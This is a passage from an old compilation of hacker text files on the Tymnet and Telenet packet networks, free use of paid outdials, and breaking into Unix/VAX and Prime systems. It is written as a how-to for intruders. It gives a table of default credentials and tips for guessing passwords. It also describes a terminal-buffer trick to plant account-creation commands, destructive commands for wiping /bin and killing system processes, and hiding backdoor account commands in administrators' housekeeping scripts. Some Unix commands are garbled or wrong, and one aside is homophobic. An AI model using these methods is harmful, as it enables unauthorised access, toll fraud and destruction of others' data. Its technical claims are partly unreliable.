  1300. These NUIs are probably the most free accounts that have been
  1301. available; meaning they had extremely little restrictions. After
  1302. entering a legitimate NUI, a colon prompt will appear. This
  1303. notifies you that Tymnet is ready to receive a NUA. NUA is an
  1304. acronym for Network User Address. This could be associated with a
  1305. BBS telephone number, as they are much alike in certain aspects.
  1306.  
  1307. Types of NUAs:
  1308.  
  1309. Chat Systems-
  1310.  
  1311. Chat systems are probably the most popular of the NUAs to hackers
  1312. on the networks. You can find many other hackers that are willing
  1313. to trade new information. As well, in-depth conversations on
  1314. hacking do take place on chat systems, so they are an excellent
  1315. place to learn for the newcomer.
  1316.  
  1317. One of the most popular chat systems is QSD France. You can reach
  1318. QSD via 208057040540 NUA. It is not a 'Live' chat system, as
  1319. messages take some time to exchange. This chat system is also an
  1320. excellent place to find other hackers to exchange information
  1321. with. But be noted, QSD is like a local chat system in France, so
  1322. you will, certain times, run into people who know nothing about
  1323. hacking. It's best to avoid these people, because they are
  1324. usually gay/lesbian, or looking for a fight. Besides, what use do
  1325. you have for the general public? When reaching QSD, remember to
  1326. change your parity to 8N1. If you logged in with 8N1, don't worry
  1327. about it. Another note, QSD treats a destructive backspace as
  1328. return. Do NOT hit backspace. The only way to get around the
  1329. backspace problem, from my knowledge, is to use a Canadian PAD.
  1330.  
  1331. Most other chat systems are run off either custom software, like
  1332. QSD, or off a Unix Shell. The Unix Shell chat systems are a bit
  1333. harder to understand, but are much more powerful. When logging in
  1334. to a Unix chat system, you will see a Logon: prompt, as most
  1335. Unix's have. Try using default accounts to logon (x25, Guest,
  1336. etc.). When logging onto a Unix Chat System which automatically
  1337. places your NUA (Your PAD Address), use the FROM= command from
  1338. the logon. RMI Chat System is a perfect example of this. Use Gast
  1339. FROM=Hell/Gast as a Username/Password. If you want other hackers
  1340. to know the exact geographical location from which you are
  1341. calling, don't bother with this, otherwise, be safe, and use the
  1342. FROM= command.
  1343.  
  1344. Unix Chat Systems resemble closely to the conferences found on
  1345. most pay networks (Compuserve, Genie, BIX, etc), as they are
  1346. 'Live', and you see messages as soon as the author writes them.
  1347.  
  1348.  
  1349. Outdials Explained:
  1350.  
  1351. Outdials that are available on Tymnet are PC-Pursuit (Telenet)
  1352. Outdials. PC-Pursuit is a pay service from Telenet where you sign
  1353. up and pay a monthly fee, and you are allowed a certain amount of
  1354. long distance data calls. Of course, when using PC-Pursuit
  1355. Outdials through Tymnet, you don't have to pay for anything.
  1356. Outdials are restricted only to dial numbers from within that
  1357. area code. If you logon to the 213 Outdial, you can only reach
  1358. data numbers in 213. These Outdials are referred to as Local
  1359. Outdials. There is another type of Outdials, and there are called
  1360. Global Outdials, or, abbreviated, GODs. GODs can call anywhere
  1361. within the United States with no restrictions, unlike LODs. The
  1362. dial format for GODs usually differs. Ask whomever you received
  1363. the GOD from for dialing procedures. Usage of Outdials is quite
  1364. simple, after logging into Tymnet, and entering the NUA of the
  1365. desired Outdial, you must hit one of three commands. If you are
  1366. new to Outdials, they have a help level available where a program
  1367. controls the modem for you via certain commands you send to it.
  1368. To reach this help level, hit either CTRL-E or '%' when you
  1369. connect to the Outdial. If you wish to use simplified AT
  1370. commands, type 'AT', and you are ready. Use the AT level just as
  1371. you would with your own modem. Entering a 1+AC+Number is not
  1372. necessary, and if done, will not work correctly. Remember, you
  1373. are logged into a certain area code, and you can only call
  1374. numbers within that area code, so just type the local 7 digit
  1375. phone number. File transferring through Tymnet/Telenet OutDial
  1376. through tymnet is tricky when you are on a BBS, you must ALWAYS
  1377. switch to 8n1,1 after you connect to a BBS through a OD, and when
  1378. you are about to transfer, the only protocol you can use is PCP
  1379. Z-Modem, aka MobyTurbo Zmodem, aka Z-Modem '90. This protocol was
  1380. made for tymnet OD's and if you don't use it, you will get a slew
  1381. of errors in your file and it will just corrupt the file and/or
  1382. abort your transfer.
  1383.  
  1384. DNIC Restrictions:
  1385.  
  1386. DNIC is an acronym for Data Network Identification Code. A DNIC
  1387. is made up of the first 4 digits of any NUA. There are plenty of
  1388. DNIC lists around, so I will not include one. A DNIC shows which
  1389. network, or country you are connecting to. Most of the NUIs that
  1390. have been around have had very little restrictions when it comes
  1391. to connecting to different DNICs, but as they are slowly dying,
  1392. you might run into trouble with new NUIs that have restrictions.
  1393. If you are trying to connect to a system in Germany, and your NUI
  1394. bars access to German DNICs, try connecting to another PAD, such
  1395. as an England PAD, and attempt connecting to the NUA again. You
  1396. should not run into many problems. It's harder to scan this way..
  1397. but it's a method around NUI restrictions. (Editor's Notes: In
  1398. this text file, the author refers to your local Tymnet dialup as
  1399. a PAD. Technically, it is. Technically, everything on Tymnet is a
  1400. PAD. When I use the acronym PAD, I mean an x28/x29 PAD, and not a
  1401. local dialup, and most of the rest of the hacker community on the
  1402. networks would agree. I find very rare instances where I see it
  1403. used in this way.) 
  1404. Here is a list of Telenet PC-Pursuit Local Out Dials:
  1405.  
  1406.      New Jersey:
  1407. 3110 201 00 022   2400 Baud
  1408.  
  1409.      District of Columbia:
  1410. 3110 202 00 117   2400 Baud
  1411.  
  1412.      Connecticut:
  1413. 3110 203 00 105   2400 Baud
  1414.  
  1415.      Washington:
  1416. 3110 206000 208   2400 Baud
  1417.  
  1418.      New York:
  1419. 3110 212 00 028   2400 Baud
  1420.  
  1421.      California:
  1422. 3110 213 00 023   2400 Baud
  1423. 3110 213 00 413   2400 Baud
  1424. 3110 714 00 004   2400 Baud
  1425. 3110 714 00 102   2400 Baud
  1426. 3110 916 00 007   2400 Baud
  1427. 3110 408 00 021   2400 Baud
  1428.  
  1429.      Texas:
  1430. 3110 214 00 022   2400 Baud
  1431. 3110 713 00 024   2400 Baud
  1432.  
  1433.      Pennsylvania:
  1434. 3110 215 00 022   2400 Baud
  1435.  
  1436.      Ohio:
  1437. 3110 216 00 120   2400 Baud
  1438.  
  1439.      Colorado:
  1440. 3110 303 00 021   2400 Baud
  1441. 3110 303 00 115   2400 Baud
  1442.  
  1443.      Florida:
  1444. 3110 305 00 122   2400 Baud
  1445. 3110 813 00 124   2400 Baud
  1446.  
  1447.      Illinois:
  1448. 3110 312 00 024   2400 Baud
  1449.  
  1450.      Michigan:
  1451. 3110 313 00 024   2400 Baud
  1452.  
  1453.      Missouri:
  1454. 3110 314 00 005   2400 Baud
  1455.  
  1456.      Alabama:
  1457. 3110 404 00 022   2400 Baud
  1458.  
  1459.      Wisconsin:
  1460. 3110 414 00 120   2400 Baud
  1461.  
  1462.      Arizona:
  1463. 3110 602 00 026   2400 Baud
  1464.  
  1465.      Minnesota:
  1466. 3110 612 00 022   2400 Baud
  1467.  
  1468.      Massachusetts:
  1469. 3110 617 00 026   2400 Baud
  1470.  
  1471.      Utah:
  1472. 3110 801 00 012   2400 Baud
  1473.  
  1474.      North Carolina:
  1475. 3110 919 00 124   2400 Baud
  1476.  
  1477.  
  1478.                            TELENET
  1479. I am writing this assuming that the reader has no knowledge of
  1480. the Telenet network. In part 1 I will discuss the basic theory of
  1481. Telenet and how it can be used as a basically safe and fun
  1482. hacking tool. Telenet is a Packet Switching Network (PSN). Since
  1483. I want to make this as short as possible I will try to give you a
  1484. *basic* understanding of what a PSN is and how it works.
  1485. Basically there are 3 levels to the PSN. The 3rd and lowest is
  1486. the PAD that you dial-up. This is where you enter all of the
  1487. information. 2nd is the actual PSN which takes the data you enter
  1488. in 128k chunks (usually) and then transmits them to the host (1st
  1489. and highest level) at baud rates ranging from 9600 to 19,200.
  1490. This means that 2 computers with different baud rates are able to
  1491. communicate (See my really bad ASCII PSN map). Ok, now you have a
  1492. *basic* understanding of how Telenet works. Now to the fun stuff!
  1493. Remember, Telenet has access to computers all over the world.
  1494. When you consider all the networks that these other computers are
  1495. connected to then you can see that you can basically access the
  1496. entire world. It is also pretty safe because there is no way that
  1497. someone can monitor all the PADs at one time.
  1498. Ok, now first you must find a list of Telenet access numbers.
  1499. There are many lists out there (look in Phrack issue 21). If you
  1500. can't find one then to find the Telenet dialup nearest your
  1501. location, call 800-424-9494 at 300/1200 baud. At the '@' prompt,
  1502. type 'MAIL'. Enter user name 'PHONES' with password 'PHONES'. So
  1503. now you have a local access number. Remember it's (7E1), so if
  1504. your screen looks messed-up then you're not set right. After you
  1505. call this is what you do.....
  1506.  
  1507. *Inside the '<>' (of course <CR> is return) is what you have to
  1508. type....
  1509.  
  1510. CONNECT 2400 (or whatever baud rate it is)
  1511. <CR> <CR>
  1512. TERMINAL=<D1><CR>
  1513. @
  1514.  
  1515.      Ok, now  you're to the @ prompt.  This is the telenet PAD
  1516. prompt.  This prompt means that telenet is in "command" mode. Now
  1517. we will get to the *real* fun.
  1518.   Telenet's computer systems are identified by NUA's. This stands
  1519. for Network User Address.  The way you connect to the NUA's are
  1520. by either typing in 'c' <nua> or just typing in the nua by
  1521. itself.  We will work w/ the 1st and most basic form on the NUA
  1522. since this is a file for people who don't know what the hell
  1523. they're doing (I'll make another G-phile for the more advanced
  1524. telenet hacker ).  The easiest form is AAA XXX, this is where AAA
  1525. stands for an area code and XXX stands for random numbers.  So if
  1526. I wanted to scan the Los Angeles area for example I would type
  1527. 213 123.  Here 213 is the area code and 123 are random numbers. 
  1528. You must have a at least 4 numbers.  So 213 1 would work as would
  1529. 213 12.
  1530.       Telenet doesn't recognize zeros or spaces so you could also
  1531. type 213 123 like this 213000000000000123 or like 213123. Ok, now
  1532. that you know how to use simple NUA's you can start messing
  1533. around.    So, now you can access all the networks and
  1534. Unix/Vax/Primes/etc... that you want right?  So, you enter 213
  1535. 123 and suddenly it says..             COLLECT CONNECTION REFUSED
  1536. F4 E6  Well, you just learned life's first lesson. Nothing in
  1537. life is free! Yes, that's right,  the "good" systems on telenet
  1538. you have to pay for. This is where a NUI comes in. This stands
  1539. for Network User ID. This is for users with "accounts" on
  1540. telenet.  NUI's are very hard to find these days ( I've only had
  1541. 1 in my hacking adventures ).  They are in the form of a user
  1542. name ( anything ) and then a password (6 numbers). These are very
  1543. hard to hack since there are no "default" names or passwords. You
  1544. type in ID <name> and then the password to user one. if you can
  1545. hack out a NUI then you should be writing G-Philes instead of
  1546. reading them.
  1547.     But don't worry though! There are *MANY* systems on telenet
  1548. that are free. The only ones that cost money are the big ones
  1549. like some BIG corporation.  By just typing in an area code and
  1550. then a random number ( up to 3 digits ) you can find some really
  1551. cool systems (hey, yo can hack into McDonalds for free!!). 
  1552. Anyway I have the most fun by turning on my Led Zeppelin CD and
  1553. just randomly typing in numbers. You will find at least 1 NUA
  1554. that connects for every 5 you type in . Its not like phreaking
  1555. where you find a code per 10 hours....    Of course there are the
  1556. lazy hackers who just want the NUA's with no work, there are many
  1557. good NUA lists ( check you local p/h/a board ). You can find a
  1558. NUA lists in a few Phrack issues or on DII (Data Infinty,
  1559. Incorporated (yes once again, I must plug my organization you
  1560. know). If you want to feel like you did something then get the
  1561. NUA Attacker. This is an IBM program that calls telenet and then
  1562. types in different NUA's ( you set the range ). It is basically a
  1563. code hacker for Telenet. This can be found on DII (Data Infinity,
  1564. Inc.) <once again> or most good p/h/a boards.                           HACKING UNIX
  1565.  
  1566. Welcome to the basics of hacking Vax's and Unix. In this article,
  1567. we discuss the unix system that runs on the various vax systems.
  1568. If you are on another unix-type system, some commands may differ,
  1569. but since it is licensed to bell, they can't make many changes.
  1570. Hacking onto a unix system is very difficult, and in this case,
  1571. we advise having an inside source, if possible. The reason it is
  1572. difficult to hack a vax is this: Many vax, after you get a
  1573. carrier from them, respond=> Login: They give you no chance to
  1574. see what the login name format is. Most commonly used are single
  1575. words, under 8digits, usually the person's name. There is a way
  1576. around this: Most vax have an acct. called 'suggest' for people
  1577. to use to make a suggestion to the system root terminal. This is
  1578. usually watched by the system operator, but at late he is
  1579. probably at home sleeping. So we can write a program to send at
  1580. the vax this type of a message: A screen freeze (Ctrl-s), screen
  1581. clear (system dependant), about 255 garbage characters, and then
  1582. a command to create a login acct., after which you clear the
  1583. screen again, then un- freeze the terminal. What this does: When
  1584. the terminal is frozen, it keeps a buffer of what is sent. well,
  1585. the buffer is about 127 characters long. so you overflow it with
  1586. trash, and then you send a command line to create an acct.
  1587. (System dependant). after this you clear the buffer and screen
  1588. again, then unfreeze the terminal. This is a bad way to do it,
  1589. and it is much nicer if you just send a command to the terminal
  1590. to shut the system down, or whatever you are after... There is
  1591. always, *Always* an acct. called root, the most powerful acct. to
  1592. be on, since it has all of the system files on it. If you hack
  1593. your way onto this one, then everything is easy from here on...
  1594. On the unix system, the abort key is the Ctrl-d key. watch how
  1595. many times you hit this, since it is also a way to log off the
  1596. system! A little about unix architecture: The root directory,
  1597. called root, is where the system resides. After this come a few
  1598. 'sub' root directories, usually to group things (stats here, priv
  1599. stuff here, the user log here...). Under this comes the superuser
  1600. (the operator of the system), and then finally the normal users.
  1601. In the unix 'Shell' everything is treated the same. By this we
  1602. mean: You can access a program the same way you access a user
  1603. directory, and so on. The way the unix system was written,
  1604. everything, users included, are just programs belonging to the
  1605. root directory. Those of you who hacked onto the root, smile,
  1606. since you can screw everything... the main level (exec level)
  1607. prompt on the unix system is the $, and if you are on the root,
  1608. you have a # (super- user prompt). Ok, a few basics for the
  1609. system... To see where you are, and what paths are active in
  1610. regards to your user account, then type > pwd This shows your
  1611. acct. separated by a slash with another pathname (acct.),
  1612. possibly many times. To connect through to another path, or many
  1613. paths, you would type: You=> path1/path2/path3 and then you are
  1614. connected all the way from path1 to path3. You can run the
  1615. programs on all the paths you are connected to. If it does not
  1616. allow you to connect to a path, then you have insufficient privs,
  1617. or the path is closed and archived onto tape. You can run
  1618. programs this way also:
  1619. you=> path1/path2/path3/program-name
  1620. unix treats everything as a program, and thus there a few
  1621. commands to learn... To see what you have access to in the end
  1622. path, type=> ls -- for list. this show the programs you can run.
  1623. You can connect to the root directory and run it's programs
  1624. with=> /root By the way, most unix systems have their log file on
  1625. the root, so you can set up a watch on the file, waiting for
  1626. people to log in and snatch their password as it passes thru the
  1627. file. To connect to a directory, use the command: => cd pathname
  1628. this allows you to do what you want with that directory. You may
  1629. be asked for a password, but this is a good way of finding other
  1630. user names to hack onto. The wildcard character in unix, if you
  1631. want to search down a path for a game or such, is the *. => ls /*
  1632. Should show you what you can access. The file types are the same
  1633. as they are on a dec, so refer to that section when examining
  1634. file. To see what is in a file, use the => pr filename command,
  1635. for print file. We advise playing with pathnames to get the hang
  1636. of the concept. There is on-line help available on most systems
  1637. with a 'help' or a '?'. We advise you look thru the help files
  1638. and pay attention to anything they give you on pathnames, or the
  1639. commands for the system. You can, as a user, create or destroy
  1640. directories on the tree beneath you. This means that root can
  1641. kill every- thing but root, and you can kill any that are below
  1642. you. These are the => mkdir pathname => rmdir pathname commands.
  1643. Once again, you are not alone on the system... type=> who to see
  1644. what other users are logged in to the system at the time. If you
  1645. want to talk to them=> write username Will allow you to chat at
  1646. the same time, without having to worry about the parser. To send
  1647. mail to a user, say => mail And enter the mail sub-system. To
  1648. send a message to all the users on the system, say => wall which
  1649. stands for 'write all' By the way, on a few systems, all you have
  1650. to do is hit the <return> key to end the message, but on others
  1651. you must hit the ctrl-d key. To send a single message to a user,
  1652. say => write username this is very handy again! If you send the
  1653. sequence of characters discussed at the very beginning of this
  1654. article, you can have the super-user terminal do tricks for you
  1655. again. Privs: If you want super-user privs, you can either log in
  1656. as root, or edit your acct. so it can say => su this now gives
  1657. you the # prompt, and allows you to completely by-pass the
  1658. protection. The wonderful security conscious developers at bell
  1659. made it very difficult to do much without privs, but once you
  1660. have them, there is absolutely nothing stopping you from doing
  1661. anything you want to. To bring down a unix system: => chdir /bin
  1662. => rm * this wipes out the pathname bin, where all the system
  1663. maintenance files are.
  1664. Or try: => r -r This recursively removes everything from the
  1665. system except the remove command itself. Or try: => kill -1,1 =>
  1666. sync This wipes out the system devices from operation. When you
  1667. are finally sick and tired from hacking on the vax systems, just
  1668. hit your ctrl-d and repeat key, and you will eventually be logged
  1669. out. The reason this file seems to be very sketchy is the fact
  1670. that bell has 7 licensed versions of unix out in the public
  1671. domain, and these commands are those common to all of them. We
  1672. recommend you hack onto the root or bin directory, since they
  1673. have the highest levels of privs, and there is really not much
  1674. you can do (except develop software) without them.
  1675.  
  1676.  
  1677.                             Primenet
  1678. Well, we've all heard of Unix and Vax systems. We hear a little
  1679. bit now and then about Cyber or Tops systems, but what is Prime?
  1680. Well, prime is a system made by Primos which has a set-up
  1681. something like DOS. Prime is arguably not as powerful as a Vax or
  1682. Unix system, but it is more user friendly (I feel) than either of
  1683. them.
  1684.  
  1685. Now, you may say to yourself "Great, why should I even learn
  1686. about prime if nobody uses it". Well there are many people who
  1687. use it (just not as many as Unix of Vax), but the real reason I
  1688. wrote this is because a good percentage of the systems found on
  1689. Telenet are prime. Since I have already wrote a telenet G-Phile
  1690. (which is very good <grin>), I thought I'd follow it up with a
  1691. primos text phile since there are so many. Also, there are no
  1692. really good primenet hacking philes (except for a good one in a
  1693. LOD/H journal and in a Phrack issue which I forget) that cover
  1694. everything.
  1695.  
  1696. First of all find a prime system. This can be done by going on
  1697. Telenet and just scanning or picking-up the LOD/H journal #4
  1698. which has a great NUA list (or any NUA list for that matter). You
  1699. can also check at your local university for one. Ok, first I tell
  1700. you the way to identify a prime system. It should be easy because
  1701. almost all prime systems have a system header that looks
  1702. something like...
  1703.  
  1704. PRIMENET 22.1.1.R27 SWWCR
  1705.  
  1706. This means that this is a primenet version 22.1.1. If for some
  1707. reason you get VERY lucky and find a version 18.xx or lower then
  1708. you're in. See, most version 18's and lower have either no
  1709. password (So you enter System for the ID which is the sysop), or
  1710. if they do have a password then all you have to do is hit a few
  1711. ^C (Control C for the beginner) for the password. Some prime
  1712. systems just sit still when you connect. On these try typing like
  1713. 'hi'. If its a prime you will get a message like...
  1714. Now, in order to logon to a prime system you must type "Login
  1715. <UserName>" or just "Login". If you type in "Login" then it will
  1716. just ask you for your username anyway. Now, here is the hardest
  1717. part of hacking. You must get a working password. Primes are hard
  1718. to hack since they don't have any default passwords.  Here is a
  1719. list that I have compiled ..... (passwords same as Username!) ╔════════════╦════════════════╗
  1720. ║ Username   ║ Password       ║
  1721. ╠════════════╬════════════════╣
  1722. ║  Prime     ║  Prime         ║
  1723. ║  System    ║  System        ║
  1724. ║  Primos    ║  Primos        ║
  1725. ║  Admin     ║  Admin         ║
  1726. ║  rje       ║  rje           ║
  1727. ║  Demo      ║  Demo          ║
  1728. ║  Guest     ║  Guest         ║
  1729. ║  Games     ║  Games         ║
  1730. ║  Netman    ║  Netman        ║
  1731. ║  Telenet   ║  Telenet       ║
  1732. ║  Tools     ║  Tools         ║
  1733. ║  Dos       ║  Dos           ║
  1734. ║  Prirun    ║  Prirun        ║
  1735. ║  Help      ║  Help          ║
  1736. ║  Test      ║  Test          ║
  1737. ║  Netlink   ║  Netlink       ║
  1738. ╚════════════╩════════════════╝
  1739.  
  1740. Not all these passwords and names are guaranteed to work. If none
  1741. of them work then try to mix-up the usernames and the passwords.
  1742. Hopefully you have now gotten into the system and get the "OK,"
  1743. prompt.
  1744.  
  1745. OK, so now you're in. If you have gotten in then that is a big
  1746. step in itself and I congratulate you. So, now you have the
  1747. prompt "OK," or something like that. This is the command prompt,
  1748. if you enter a bad command it may look different such as "ERR,"
  1749. or soething like that. This is nothing to worry about just an
  1750. error message. Ok, first I'm going to run down some basic
  1751. commands. First of all we must understand how primos is set-up.
  1752. The primos set-up is very much like MS-DOS There are separate
  1753. directories each with files and more directories in them . It is
  1754. pretty easy to navigate, so i will just give you the commands and
  1755. then explain what to do with them.... 
  1756. LD                shows the contents of the current directory
  1757.                   you're in.
  1758. Attach            attaches (move) to another directory.
  1759. Delete            deletes a file or directory.
  1760. ED                text editor to edit/create text.
  1761. Logout            logs-off
  1762. Netlink           enters the netlink section.
  1763. Slist             lists the contents (text) of a file
  1764. CPL <filename>    runs a .CPL program
  1765. Users             lists the amount of users on the system.
  1766. Status Users      gets the names, numbers and locations of the
  1767.                   users on line.
  1768. Help              gets a list of the commands.
  1769. Help <command>    gets help with a command
  1770.  
  1771.  
  1772. Ok, those should be enough for the time being. Now, lets start by
  1773. doing a 'LD' (anything in single quotes means to type it). The
  1774. name of the directory you're in right now should be the same as
  1775. your user name. There may be a few files in here so to see the
  1776. contents of the files type 'SLIST <filename>'. Now, lets do an
  1777. 'Attach MFD'. This is the "Main File Directory" where most of the
  1778. major files and directories are found. So now we will do another
  1779. "LD" and look at all the directories and files. Ok, now to start
  1780. the hacking. This method works with most primes, but not all so
  1781. don't be to discouraged if it doesn't work. Ok, first of all you
  1782. probably noticed that when you first started-out the directory
  1783. you were in had the same name as your username (id). This is a
  1784. very important lesson. The reason this is important is because
  1785. now you can probably figure-out that *The name of every directory
  1786. is also the name of a
  1787. user* (NOTE: This is true for all directories, EXCEPT ones with
  1788. an asterix '*' by their name). This means 2 things, first of all
  1789. it means that you can basically find a fair amount of usernames
  1790. from the mfd directory and the odds are that a few of them will
  1791. have the same password as the name (This is an important lesson
  1792. in hacking, whenever you're on any kind of system et a user list
  1793. and then just go through the list, using the username as the
  1794. password and you should get a few accounts at least) Secondly it
  1795. means that you can access a certain users "private" directory.
  1796. What this means is that a lot of the usernames of actually people
  1797. may not be in the MFD directory. This means that once you find
  1798. out a username you can then simply say "attach <username>" and
  1799. your in their directory.  So, now knowing that we will do a
  1800. 'Status Users'. This will give you a list somewhat like this:
  1801.  
  1802. User               Number          Device
  1803. Guest              14              <MDF0>
  1804. System             1               <MDF0> <MFD1>
  1805. Hacker             81              <MDF0>
  1806. Sysmaint           19              <MDD0>  (phantom)
  1807.  
  1808. From this list we can get all the usernames/directories of the
  1809. users on-line and start snooping. It is usually not ood to be on
  1810. when there are a lot of people on since a Sysop might notice that
  1811. you shouldn't be on at that time or something. You may notice
  1812. that the last one (Sysmaint) has the word Phantom by it. This
  1813. means that it is just a program that is doing house keeping
  1814. stuff. Its nothing to worry about. The devices are merely like a
  1815. tree in other software (UNIX/VAX), if there are 2 devices then it
  1816. means that the user is either interacting with another system or
  1817. has logged-off incorrectly. So, now we have some usernames /
  1818. directories to look at (and to try as passwords for the same
  1819. username). Now first of all we want to go back to the MFD
  1820. directory and look for a directory that is something like UTIL,
  1821. Utilities, CCUTIL or whatever. This part is very site dependant
  1822. so just try any thing that looks like a util. Now attach to that
  1823. directory which is 'Attach Util' (assuming the name is Util). Now
  1824. we get to another important part of Primenet. The different file
  1825. formats.....
  1826.  
  1827. FileSuffix      How to execute/Description
  1828. ╔════════════╦═══════════════════════════╗
  1829. ║   .CPL     ║  CPL<Pathaname>/Language  ║
  1830. ║   .SAVE    ║  SAVE<Pathname>           ║
  1831. ║   .SEG     ║  SEG<pathname>            ║
  1832. ║   .TXT     ║  SLIST<pathname>          ║
  1833. ╚════════════╩═══════════════════════════╝
  1834.  
  1835. This list shows you the different file suffixes you'll see. Every
  1836. file will be followed by a suffix. If it is not then you can
  1837. assume its text. The only suffix we want to worry about now is
  1838. the CPL suffix. CPL (Command Procedure Language) is the primos
  1839. "programming language". So you can assume that anything with a
  1840. .CPL suffix is some type of program. Most often you will find
  1841. simple programs which tell the date, some "menus" that people
  1842. programmed in CPL to navigate the system easier, and then their
  1843. own misc CPL files. To run a CPL file you type 'CPL <pathname>'
  1844. (the pathname is simply the file name). Now, since CPL is a
  1845. language it's programs must some how be written. This means that
  1846. by doing a SLIST on a .CPL file will display the contents &
  1847. source code of the .CPL file.
  1848.  
  1849. Ok, so back to the hacking. So we're in the Util's library (or
  1850. whatever the name of the directory is). Ok, now do an 'LD' to see
  1851. the contents and look for any .CPL files. Lets say there's a CPL
  1852. file named "CleanUp.CPL". Now you'd type 'SLIST CleanUp.CPL',
  1853. this will display the source code of the CleanUp program. Now,
  1854. you will get a lot of trash but in it somewhere look for a line
  1855. that is something like...
  1856.  
  1857.  
  1858. A UTIL KEWL
  1859.        │        ^Password
  1860.        └─┤ Directory name
  1861.  
  1862. So, what does this mean you ask?? Well first off we will remember
  1863. that every Directory (except for ones with stars by them) is a
  1864. username which you can log-on with. So this means that the
  1865. password for the username Util is KEWL !!! If you have found a
  1866. line like this then congratulate yourself..you have SYS1 access.
  1867. Just in case you don't really understand, lets say that there was
  1868. a directory's name was COUNT, and the password was ZER0. Now, if
  1869. you got lucky and were on a system where this works then you'd
  1870. see a line like...
  1871.  
  1872. A COUNT ZER0
  1873.  
  1874. Another way to find out directory/usernames is by using the
  1875. 'List_Access' command. This shows the different directories that
  1876. the current directory has access to. This will look something
  1877. like... 
  1878.  
  1879. ACL "<current directory":
  1880.  
  1881. JOHN   :  ALL
  1882. SALLY  :  LUR
  1883. ADMIN  :  NONE
  1884. GAMES  :  LUR
  1885.  
  1886. From this you can see the names of directories that you would
  1887. normally could not access, because if you don't know the name of
  1888. a directory then you can't access it. You can do this at
  1889. different directories and sometimes you will find a different set
  1890. of directory/username names. Ok, so you should pretty much
  1891. understand what we are looking for. If this doesn't work in one
  1892. directory then keep checking in other log-on able directories.
  1893. Remember this technique only works like 70% of the time so if it
  1894. doesn't work then don't worry. Since the above technique of
  1895. primos hacking is well known, by both hackers and Sysops I expect
  1896. to have a large percentage of readers still stuck in their
  1897. "Guest" account. I will now tell you how you can both defet
  1898. security and how you can secure yourself. First of all, lets
  1899. boost your account as much as you can (with your current access
  1900. of course). To do this we will use the CHAP command. This will
  1901. edit or priority levels. To do this we will use the 'CHAP UP'
  1902. command (remember anything in single quotes you type). You can
  1903. also use 'CHAP DOWN' or 'CHAP X' where X equals the amount of
  1904. levels you want to jump up to. Each system will have different
  1905. levels, so do it about 10 times and then stop (unless you get a
  1906. message that you have reached the limit already). The main reason
  1907. we want high security is so we can get into other directories and
  1908. run high-access programs (and access high-access commands). So
  1909. first I will discuss Directory security. Here is a diagram of the
  1910. different levels of security that can be put on directories....
  1911.  
  1912.                             ┌───────────┐
  1913.                              │Directories│
  1914.                              └───────────┘
  1915.  
  1916.   Letter   Description of Access
  1917. ╔════════╦═════════════════════════════════╗
  1918. ║   P    ║ To protect the directory        ║
  1919. ║   D    ║ Delete entries to directory     ║
  1920. ║   A    ║ To add entries to a directory   ║
  1921. ║   L    ║ Read contents within a directory║
  1922. ║   U    ║ Lets you attach to the directory║
  1923. ║   R    ║ Read contents of file           ║
  1924. ║  All   ║ All of the above                ║
  1925. ║ None   ║ No access to others             ║
  1926. ╚════════╩═════════════════════════════════╝
  1927.  
  1928. So, from this you can see the different options that one can put
  1929. to protect a library. These letters can also be combined to form
  1930. a "word" (so to speak), so that you can incorporate different
  1931. types of access. The most commonly found example of this would be
  1932. "LUR" access. So, using the chart this means that someone can
  1933. Read the contents of the directory, Attach to it, and Read the
  1934. contents of the files in the directory. Basically this means that
  1935. you can read all you want but you can't edit, which in some cases
  1936. can be good. Since this file is also geared towards the well
  1937. educated user I will discuss how to change the access on
  1938. directories, and how to create/delete directories. I would
  1939. strongly suggest that anyone who has hacked an account not try to
  1940. create delete files (unless you want to get back at someone on
  1941. the system, which will be discussed later), since it will lead to
  1942. detection and erasure of the account (This is a general rule of
  1943. hacking, read all the info you want, but keep a low profile). By
  1944. default most directories will be set to ALL access when created.
  1945. Prime is one of those big network, open systems, and many people
  1946. never bother or don't know how to make their account's more
  1947. secure. (this will be painfully obvious (to the users) when you
  1948. get one <grin>). Because of this you will find *MANY* directories
  1949. with ALL access. I have found many directories of people who have
  1950. SYS1 access, with ALL access. Most of the other people will have
  1951. LUR access. This is still very sufficient for your needs, since U
  1952. can still read files. Since I want to be slightly kind I will
  1953. discuss how to change access on directories, for the people who
  1954. have legit prime accounts. If you have a hacked account then
  1955. there should be no reason for you to change access on a
  1956. directory, first of all you will be detected in a second, and
  1957. second of all its not permanent at all and can't be used to crash
  1958. the board. First of all the command to create a directory is
  1959. 'Create <directory name> [-password] [-access]'. So in other
  1960. words if I wanted to create a mail directory with the password of
  1961. HACK and LUR access hen I'd type. 
  1962.  
  1963. Create Mail [-HACK] [-LUR]
  1964.  
  1965.  The command for changing access on a directory is...
  1966.  
  1967. Set_Access ALL [-LUR]
  1968.  
  1969. In this example we are changing a directories access to LUR (you
  1970. can read but you can't edit) from ALL (everything). Since there
  1971. is no real reason you would want anyone else changing your files
  1972. I would suggest at least LUR access. If you are really worried
  1973. then I would not even think twice about going to NONE access, its
  1974. up to you. Although changing access is the most effective way to
  1975. secure your directory, there are some people who would like
  1976. others to read, or maybe even edit files in their directory. This
  1977. is why I usually tell people to just make a password, this
  1978. command has already been discussed.. That about wraps it up for
  1979. their directory part of this file. This is the major an most
  1980. important part. Now we get to the fun little features.
  1981.  
  1982.  
  1983.                      ┌───────────────────────────────────┐
  1984.                      │Creating Files and Writing Programs│
  1985.                      └───────────────────────────────────┘
  1986.  
  1987. Creating files are a very important part of hacking prime net.
  1988. The main reason we want to create files is so we can take
  1989. advantage of the CPL language. I have not learned the CPL
  1990. language well enough so I really can't explain much about it. I'm
  1991. still looking for technical manuals. The easiest way to learn it
  1992. is by just looking at all the .CPL files. Once we learn the CPL
  1993. language we can simply add commands to create us new accounts to
  1994. house keeping programs. The reason we would want to do this is
  1995. because when it is run by the admin, or any user with high enough
  1996. access it will run these embedded commands and we will have a new
  1997. account with unlimited access!! The way to create a file is by
  1998. typing 'ED'. This will get you into the text editor. It should
  1999. look something like.. 
  2000.  
  2001. INPUT
  2002.  
  2003. This means you can type in what ever you want. So lets say you
  2004. are making a file that, when run will type out 'Count_ZER0 is the
  2005. ruler of heaven and earth', you would type...
  2006.  
  2007. Type Count_ZER0 is the ruler of heaven and earth
  2008.  
  2009. Now, you'd type just a <CR> alone and you'll get a line like...
  2010.  
  2011. COMMAND
  2012.  
  2013. This line varies a lot from system to system, but you'll get
  2014. something to that affect. Here you would now type 'Save
  2015. Count.CPL'. This would then save a program call Count.CPL in the
  2016. directory and when you ran it (Discussed earlier) it would type
  2017. 'Count_ZER0 is the ruler of heaven and earth' on the screen.
